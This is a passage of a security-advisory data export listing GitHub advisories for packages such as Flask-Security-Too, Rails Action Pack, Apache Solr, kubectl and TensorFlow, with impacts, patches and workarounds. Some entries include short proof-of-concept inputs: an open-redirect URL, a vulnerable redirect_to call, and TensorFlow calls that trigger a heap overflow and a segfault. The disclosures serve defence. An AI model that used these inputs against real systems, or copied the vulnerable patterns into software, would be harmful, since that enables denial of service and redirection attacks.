'github_reviewed': True, 'github_reviewed_at': '2021-05-18T16:46:49Z', 'nvd_published_at': '2021-05-28T21:15:00Z'}" +1.4.0,GHSA-4g53-vp7q-gfjv,2021-05-27T22:24:49Z,2021-05-28T19:18:28Z,,[],constructEvent does not verify header,"### Impact +Anyone verifying a Stripe webhook request via this library's `constructEvent` function. + +### Patches +Upgrade to 1.1.4. + +### Workarounds +Use `await verifyHeader(...)` directly instead of `constructEvent`. + +### References +https://github.com/worker-tools/stripe-webhook/issues/1 +",[],"[{'package': {'ecosystem': 'npm', 'name': '@worker-tools/stripe-webhook'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/worker-tools/stripe-webhook/security/advisories/GHSA-4g53-vp7q-gfjv'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T22:24:49Z', 'nvd_published_at': None}" +1.4.0,GHSA-6qmf-fj6m-686c,2023-01-23T18:55:32Z,2021-05-17T20:51:27Z,,['CVE-2021-32618'],Open Redirect in Flask-Security-Too,"### Impact +Flask-Security allows redirects after many successful views (e.g. /login) by honoring the ?next query param. There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. + +This check utilizes Pythons urlsplit library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com +will pass FS's relative URL check however many browsers will gladly convert this to http://github.com. Thus an attacker could send such a link to an unwitting user, using a legitimate site and have it redirect to whatever site they want. + +This is considered a low severity due to the fact that if Werkzeug by default ALWAYS ensures that the Location header is absolute - thus making this attack vector mute. It is possible for application writers to modify this default behavior by setting the 'autocorrect_location_header=False` which would then open up their application to this attack. + +### Patches +No patches as this time + +### Workarounds +If using Werkzeug, make sure to use the default Location header setting. If you can't - then use@app.after_request and write your own validation of the Location header if it is set. + +### References +No. + +### For more information +If you have any questions or comments about this advisory follow: https://github.com/Flask-Middleware/flask-security/issues/486 + +Thanks to Claroty (2021-0141) and @snoopysecurity for providing details and proof of concept. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Flask-Security-Too'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32618'}, {'type': 'WEB', 'url': 'https://github.com/Flask-Middleware/flask-security/issues/486'}, {'type': 'WEB', 'url': 'https://github.com/Flask-Middleware/flask-security/pull/489'}, {'type': 'WEB', 'url': 'https://github.com/Flask-Middleware/flask-security/commit/e39bb04615050448c1b8ba4caa7dacc0edd3e405'}, {'type': 'PACKAGE', 'url': 'https://github.com/Flask-Middleware/flask-security'}]","{'cwe_ids': ['CWE-601'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T16:53:26Z', 'nvd_published_at': None}" +1.4.0,GHSA-hjg4-8q5f-x6fm,2023-07-05T20:17:23Z,2021-05-05T19:49:02Z,,['CVE-2021-22885'],Action Pack contains Information Disclosure / Unintended Method Execution vulnerability,"Impact +------ +There is a possible information disclosure / unintended method execution vulnerability in Action Pack when using the `redirect_to` or `polymorphic_url` helper with untrusted user input. + +Vulnerable code will look like this. + +``` +redirect_to(params[:some_param]) +``` + +All users running an affected release should either upgrade or use one of the workarounds immediately. + +Releases +-------- +The FIXED releases are available at the normal locations. + +Workarounds +----------- +To work around this problem, it is recommended to use an allow list for valid parameters passed from the user. For example, + +```ruby +private def check(param) + case param + when ""valid"" + param + else + ""/"" + end +end + +def index + redirect_to(check(params[:some_param])) +end +``` + +Or force the user input to be cast to a string like this, + +```ruby +def index + redirect_to(params[:some_param].to_s) +end +``` + +Patches +------- +To aid users who aren't able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset. + +* 5-2-information-disclosure.patch - Patch for 5.2 series +* 6-0-information-disclosure.patch - Patch for 6.0 series +* 6-1-information-disclosure.patch - Patch for 6.1 series + +Please note that only the 5.2, 6.0, and 6.1 series are supported at present. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases. + +Credits +------- + +Thanks to Benoit Côté-Jodoin from Shopify for reporting this.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.3.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.3.6'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.1.0'}, {'fixed': '6.1.3.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.1.3.1'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.2.5'}, {'fixed': '5.2.6'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '5.2.4.6'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.4.5'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22885'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1106652'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2021-22885.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/rubyonrails-security/c/NiQl-48cXYI'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210805-0009/'}]","{'cwe_ids': ['CWE-200', 'CWE-209'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T19:48:10Z', 'nvd_published_at': '2021-05-27T12:15:00Z'}" +1.4.0,GHSA-qqc5-rgcc-cjqh,2023-08-30T11:37:11Z,2021-05-18T18:34:18Z,,['CVE-2021-22133'],Information Disclosure in go.elastic.co/apm,"The Elastic APM agent for Go versions before 1.11.0 can leak sensitive HTTP header information when logging the details during an application panic. Normally, the APM agent will sanitize sensitive HTTP header details before sending the information to the APM server. During an application panic it is possible the headers will not be sanitized before being sent.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'go.elastic.co/apm'}, 'ecosystem_specific': {'affected_functions': ['NewTracer', 'NewTracerOptions', 'modelWriter.buildModelTransaction']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22133'}, {'type': 'WEB', 'url': 'https://github.com/elastic/apm-agent-go/pull/888'}, {'type': 'WEB', 'url': 'https://github.com/elastic/apm-agent-go/commit/c5c7e21aa26a6def7790f74fbceed792ad47ef35'}, {'type': 'WEB', 'url': 'https://github.com/elastic/apm-agent-go/commit/dd3e8c593580e7b80a98b57e1cc6e017e56747b4'}, {'type': 'WEB', 'url': 'https://discuss.elastic.co/t/elastic-apm-agent-for-go-1-11-0-security-update/263252'}, {'type': 'PACKAGE', 'url': 'https://github.com/elastic/apm-agent-go'}, {'type': 'WEB', 'url': 'https://github.com/elastic/apm-agent-go/compare/v1.10.0...v1.11.0'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0706'}]","{'cwe_ids': ['CWE-532'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T22:01:55Z', 'nvd_published_at': None}" +1.4.0,GHSA-q6pj-jh94-5fpr,2023-09-11T22:26:16Z,2021-05-07T16:14:39Z,,['CVE-2020-7606'],OS Command Injection in docker-compose-remote-api,"docker-compose-remote-api through 0.1.4 allows execution of arbitrary commands. Within `index.js` of the package, the function `exec(serviceName, cmd, fnStdout, fnStderr, fnExit)` uses the variable `serviceName` which can be controlled by users without any sanitization.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'docker-compose-remote-api'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7606'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DOCKERCOMPOSEREMOTEAPI-560125'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T20:48:32Z', 'nvd_published_at': '2020-03-15T22:15:00Z'}" +1.4.0,GHSA-44r7-7p62-q3fr,2023-08-29T22:33:25Z,2021-05-18T21:09:13Z,,['CVE-2019-19794'],miekg/dns insecurely generates random numbers,"The miekg Go DNS package before 1.1.25, as used in CoreDNS before 1.6.6 and other products, improperly generates random numbers because math/rand is used. The TXID becomes predictable, leading to response forgeries.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/miekg/dns'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.25'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19794'}, {'type': 'WEB', 'url': 'https://github.com/coredns/coredns/issues/3519'}, {'type': 'WEB', 'url': 'https://github.com/coredns/coredns/issues/3547'}, {'type': 'WEB', 'url': 'https://github.com/miekg/dns/issues/1037'}, {'type': 'WEB', 'url': 'https://github.com/miekg/dns/issues/1043'}, {'type': 'WEB', 'url': 'https://github.com/miekg/dns/pull/1044'}, {'type': 'WEB', 'url': 'https://github.com/miekg/dns/commit/8ebf2e419df7857ac8919baa05248789a8ffbf33'}, {'type': 'WEB', 'url': 'https://github.com/miekg/dns/compare/v1.1.24...v1.1.25'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0008'}]","{'cwe_ids': ['CWE-330', 'CWE-338'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T20:42:52Z', 'nvd_published_at': None}" +1.4.0,GHSA-rc4q-9m69-gqp8,2021-05-17T20:29:48Z,2021-05-17T20:53:30Z,,['CVE-2021-29624'],Lack of protection against cookie tossing attacks in fastify-csrf,"### Impact + +Users that used fastify-csrf with the ""double submit"" mechanism using cookies with an application deployed across multiple subdomains, e.g. ""heroku""-style platform as a service. + +### Patches + +Version 3.1.0 of the fastify-csrf fixes it. +See https://github.com/fastify/fastify-csrf/pull/51 and https://github.com/fastify/csrf/pull/2. + +The user of the module would need to supply a `userInfo` when generating the CSRF token to fully implement the protection on their end. This is needed only for applications hosted on different subdomains. + +### Workarounds + +None available. + +### References + +1. https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html +2. https://owasp.org/www-pdf-archive/David_Johansson-Double_Defeat_of_Double-Submit_Cookie.pdf + +### Credits + +This vulnerability was found by Xhelal Likaj . + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [fastify-csrf](https://github.com/fastify/fastify-csrf) +* Email us at [hello@matteocollina.com](mailto:hello@matteocollina.com) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'fastify-csrf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/fastify/fastify-csrf/security/advisories/GHSA-rc4q-9m69-gqp8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29624'}, {'type': 'WEB', 'url': 'https://github.com/fastify/csrf/pull/2'}, {'type': 'WEB', 'url': 'https://github.com/fastify/fastify-csrf/pull/51'}, {'type': 'WEB', 'url': 'https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html'}, {'type': 'WEB', 'url': 'https://github.com/fastify/fastify-csrf/releases/tag/v3.1.0'}, {'type': 'WEB', 'url': 'https://owasp.org/www-pdf-archive/David_Johansson-Double_Defeat_of_Double-Submit_Cookie.pdf'}]","{'cwe_ids': ['CWE-352', 'CWE-565'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T20:29:48Z', 'nvd_published_at': '2021-05-19T22:15:00Z'}" +1.4.0,GHSA-5phw-3jrp-3vj8,2021-04-14T15:52:41Z,2021-05-10T15:18:06Z,,['CVE-2021-27905'],Server-Side Request Forgery in Apache Solr,"The ReplicationHandler (normally registered at ""/replication"" under a Solr core) in Apache Solr has a ""masterUrl"" (also ""leaderUrl"" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the ""shards"" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.solr:solr-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.8.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27905'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0ddc3a82bd7523b1453cb7a5e09eb5559517145425074a42eb326b10%40%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r140128dc6bb4f4e0b6a39e962c7ca25a8cbc8e48ed766176c931fccc@%3Cusers.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3da74965aba2b5f5744b7289ad447306eeb2940c872801819faa9314@%3Cusers.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6ccec7fc54d82591b23c143f1f6a6e38f6e03e75db70870e4cb14a1a@%3Ccommits.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r720a4a0497fc90bad5feec8aa18b777912ee15c7eeb5f882adbf523e@%3Ccommits.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r78a3a4f1138a1608b0c6d4a2ee7647848c1a20b0d5c652cd9b02c25a@%3Ccommits.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8f1152a43c36d878bbeb5a92f261e9efaf3af313b033d7acfccea59d@%3Cnotifications.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r95df34bb158375948da82b4dfe9a1b5d528572d586584162f8f5aeef@%3Cusers.solr.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rae9ccaecce9859f709ed1458545d90a4c07163070dc98b5e9e59057f@%3Cnotifications.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd232d77c57a8ce172359ab098df9512d8b37373ab87c444be911b430@%3Cnotifications.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re9d64bb8e5dfefddcbf255adb4559e13a0df5b818da1b9b51329723f@%3Cnotifications.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210611-0009/'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-14T15:52:41Z', 'nvd_published_at': '2021-04-13T07:15:00Z'}" +1.4.0,GHSA-6qfg-8799-r575,2023-09-18T20:30:39Z,2021-05-18T15:30:07Z,,['CVE-2019-11251'],Kubernetes kubectl cp Vulnerable to Symlink Attack,"The Kubernetes kubectl cp command in versions 1.1-1.12, and versions prior to 1.13.11, 1.14.7, and 1.15.4 allows a combination of two symlinks provided by tar output of a malicious container to place a file outside of the destination directory specified in the kubectl cp invocation. This could be used to allow an attacker to place a nefarious file using a symlink, outside of the destination tree.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.13.10'}, {'fixed': '1.13.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.14.6'}, {'fixed': '1.14.7'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/kubernetes'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.15.3'}, {'fixed': '1.16.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-11251'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/issues/87773'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/pull/82143'}, {'type': 'WEB', 'url': 'https://groups.google.com/d/msg/kubernetes-announce/YYtEFdFimZ4/nZnOezZuBgAJ'}]","{'cwe_ids': ['CWE-59', 'CWE-61'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T21:58:06Z', 'nvd_published_at': None}" +1.4.0,GHSA-3xh2-74w9-5vxm,2023-02-09T19:37:02Z,2021-05-18T21:08:02Z,,['CVE-2020-27813'],Integer overflow in github.com/gorilla/websocket,An integer overflow vulnerability exists with the length of websocket frames received via a websocket connection. An attacker would use this flaw to cause a denial of service attack on an HTTP Server allowing websocket connections.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/gorilla/websocket'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gorilla/websocket/security/advisories/GHSA-jf24-p9p9-4rjh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27813'}, {'type': 'WEB', 'url': 'https://github.com/gorilla/websocket/pull/537'}, {'type': 'WEB', 'url': 'https://github.com/gorilla/websocket/commit/5b740c29263eb386f33f265561c8262522f19d37'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1902111'}, {'type': 'PACKAGE', 'url': 'https://github.com/gorilla/websocket'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/01/msg00008.html'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0019'}]","{'cwe_ids': ['CWE-190', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T20:56:17Z', 'nvd_published_at': None}" +1.4.0,GHSA-mqh2-9wrp-vx84,2021-05-18T20:32:28Z,2021-05-21T14:24:51Z,,['CVE-2021-29558'],Heap buffer overflow in `SparseSplit`,"### Impact +An attacker can cause a heap buffer overflow in `tf.raw_ops.SparseSplit`: + +```python +import tensorflow as tf + +shape_dims = tf.constant(0, dtype=tf.int64) +indices = tf.ones([1, 1], dtype=tf.int64) +values = tf.ones([1], dtype=tf.int64) +shape = tf.ones([1], dtype=tf.int64) + +tf.raw_ops.SparseSplit( + split_dim=shape_dims, indices=indices, values=values, + shape=shape, num_split=1) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/699bff5d961f0abfde8fa3f876e6d241681fbef8/tensorflow/core/util/sparse/sparse_tensor.h#L528-L530) accesses an array element based on a user controlled offset: + +```cc +const int dim = input_tensor.indices().matrix()(i, split_dim); +int slice_index = GetSliceIndex(dim, split_size, residual); +num_values[slice_index]++; +``` + +This results in overriding values on the heap. + +### Patches +We have patched the issue in GitHub commit [8ba6fa29cd8bf9cef9b718dc31c78c73081f5b31](https://github.com/tensorflow/tensorflow/commit/8ba6fa29cd8bf9cef9b718dc31c78c73081f5b31). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-mqh2-9wrp-vx84'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29558'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8ba6fa29cd8bf9cef9b718dc31c78c73081f5b31'}]","{'cwe_ids': ['CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T20:32:28Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-g98m-96g9-wfjq,2023-07-05T20:18:22Z,2021-05-10T14:53:59Z,,['CVE-2019-3881'],Insecure path handling in Bundler,"Bundler prior to 2.1.0 uses a predictable path in `/tmp/`, created with insecure permissions as a storage location for gems, if locations under the user's home directory are not available. If Bundler is used in a scenario where the user does not have a writable home directory, an attacker could place malicious code in this directory that would be later loaded and executed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'bundler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.14.0'}, {'fixed': '2.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-3881'}, {'type': 'WEB', 'url': 'https://github.com/rubygems/bundler/issues/6501'}, {'type': 'WEB', 'url': 'https://github.com/rubygems/bundler/pull/7416/commits/65cfebb041c454c246aaf32a177b0243915a9998'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1651826'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-g98m-96g9-wfjq'}, {'type': 'PACKAGE', 'url': 'https://github.com/rubygems/bundler'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/bundler/CVE-2019-3881.yml'}]","{'cwe_ids': ['CWE-427', 'CWE-552'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T22:52:44Z', 'nvd_published_at': '2020-09-04T12:15:00Z'}" +1.4.0,GHSA-vq2r-5xvm-3hc3,2021-05-18T17:50:50Z,2021-05-21T14:26:30Z,,['CVE-2021-29581'],Segfault in `CTCBeamSearchDecoder`,"### Impact +Due to lack of validation in `tf.raw_ops.CTCBeamSearchDecoder`, an attacker can trigger denial of service via segmentation faults: + +```python +import tensorflow as tf + +inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) +sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], +shape=[8], dtype=tf.int32) +beam_width = 10 +top_paths = 3 +merge_repeated = True + +tf.raw_ops.CTCBeamSearchDecoder( + inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, + top_paths=top_paths, merge_repeated=merge_repeated) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/a74768f8e4efbda4def9f16ee7e13cf3922ac5f7/tensorflow/core/kernels/ctc_decoder_ops.cc#L68-L79) fails to detect cases when the input tensor is empty and proceeds to read data from a null buffer. + +### Patches +We have patched the issue in GitHub commit [b1b323042264740c398140da32e93fb9c2c9f33e](https://github.com/tensorflow/tensorflow/commit/b1b323042264740c398140da32e93fb9c2c9f33e). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': 